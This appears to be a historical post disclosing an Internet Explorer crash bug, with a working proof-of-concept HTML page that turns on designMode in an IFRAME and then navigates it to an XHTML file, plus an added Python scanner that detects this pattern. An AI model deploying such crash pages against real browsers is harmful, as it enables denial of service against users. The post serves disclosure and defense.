Enabling designMode on an IFRAME’s document and then navigating the IFRAME to an XHTML file that contains a DOCTYPE declaration crashes IE. The designMode state apparently conflicts with XHTML’s DTD processing during the navigation.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_designMode_DTD_XHTML</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>DoS_designMode_DTD_XHTML</h2>
<iframe name="designModeIframe" width="100" height="100"></iframe><br /><br />
<input type="button" value="CrashMe" onclick="setTimeout('crashMe()',100)"><br /><br />
</center>
<hr /><br />
1) Turn <b>on</b> the <b>designMode</b> of the IFRAME.<br /><br />
2) Change the location of the IFRAME to <u>any valid <b>xhtml</b> file</u> that at least contains the <b>docType tag</b>.<br /><br /><hr />
</font>
<script type="text/javascript">
function crashMe()
{
/* Step 1: turn on designMode for the IFRAME's current document. */
designModeIframe.document.designMode = "on";
/* Step 2: navigate the same IFRAME to an XHTML file with a DOCTYPE. */
designModeIframe.location.replace("iframe.html");
}
</script>
</body>
</html>
The iframe.html target is a minimal XHTML file containing only the DOCTYPE declaration. When designMode is already set to "on" and the IFRAME then loads a document with a proper XHTML doctype, the mode transition through DTD parsing triggers a crash. The 100ms setTimeout before calling crashMe is needed to ensure the initial IFRAME state is ready.
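A defender-side way to spot pages built like the proof of concept above is to scan inline scripts for the two-step sequence it depends on: designMode switched on for a frame's document, followed later in the same script by a navigation of that frame. This is an added example, not code from the original post; the two HTML samples are constructed, and the scanner also accepts `location.assign`, `location =` and `src =` as navigations, not only the `location.replace` used on this page.

```python
"""Flag HTML whose inline scripts enable designMode on an IFRAME and then
navigate that IFRAME. Added example; sample documents below are constructed."""
import re
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Gather the text of every <script> block in the document."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # script bodies may arrive in several chunks
            self.scripts[-1] += data


# <frame>.document.designMode = "on"
DESIGNMODE_ON = re.compile(r"(\w+)\.document\.designMode\s*=\s*['\"]on['\"]", re.I)
# <frame>.location.replace("x") / .location.assign("x") / .location = "x" / .src = "x"
NAVIGATE = re.compile(
    r"(\w+)\.(?:location\.(?:replace|assign)\(|location\s*=|src\s*=)\s*['\"]([^'\"]*)['\"]",
    re.I,
)


def find_designmode_navigation(html: str):
    """Return (frame, target) pairs where a frame's designMode is turned on and
    the same frame is navigated afterwards in the same script block."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        for dm in DESIGNMODE_ON.finditer(script):
            frame = dm.group(1)
            # Only navigations *after* the designMode assignment matter.
            for nav in NAVIGATE.finditer(script, dm.end()):
                if nav.group(1).lower() == frame.lower():
                    findings.append((frame, nav.group(2)))
    return findings


# Constructed sample mirroring the crash sequence on this page.
CRASH_SAMPLE = """<html><body><iframe name="designModeIframe"></iframe>
<script type="text/javascript">
function crashMe() {
  designModeIframe.document.designMode = "on";
  designModeIframe.location.replace("iframe.html");
}
</script></body></html>"""

# Constructed sample with the safe ordering: navigate first, enable designMode on load.
SAFE_SAMPLE = """<html><body><iframe name="editor"></iframe>
<script type="text/javascript">
editor.location.replace("editor.html");
editor.onload = function () { editor.document.designMode = "on"; };
</script></body></html>"""
```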
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.